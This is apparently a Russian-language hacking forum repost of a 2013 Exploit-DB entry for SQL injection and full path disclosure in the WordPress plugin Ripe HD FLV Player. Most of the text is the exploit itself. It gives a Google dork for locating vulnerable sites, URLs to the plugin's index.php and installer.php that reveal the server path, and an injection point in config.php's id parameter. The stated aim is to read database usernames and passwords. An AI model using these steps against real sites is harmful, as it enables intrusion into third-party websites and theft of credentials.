Exploit WordPress Plugin Ripe HD FLV Player - SQL Injection

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
24229
Проверка EDB
  1. Пройдено
Автор
ZIKOU-16
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
null
Дата публикации
2013-01-19
Код:
-------------------------------------------------------------------
Wordpress plugins - ripe-hd-player FD/SQL Injection Vulnerability 
-------------------------------------------------------------------
# Vendor: http://www.hitasoft.com/products.php 
#####
# Author => Zikou-16
# E-mail => [email protected]
# Facebook => http://fb.me/Zikou.se
# Google Dork => inurl:"/wp-content/plugins/ripe-hd-player/"
# Tested on : Windows 7 , Backtrack 5r3
####
 
#=> Exploit Info :
------------------
# The attacker can access to the database & get username & password ....... &  disclosure the Full Path 
------------------

#=> Exploit :
------------------
1#=> Full Path Disclosure :

http://[target]/[path]/wp-content/plugins/ripe-hd-player/index.php
http://[target]/[path]/wp-content/plugins/ripe-hd-player/installer.php 

-------
2#=> SQL Injection 

http://[target]/[path]/wp-content/plugins/ripe-hd-player/config.php?id=2'[inj3ct h3re]

------------------------------ <= Th3 End ^_^'
 
Источник
www.exploit-db.com

Похожие темы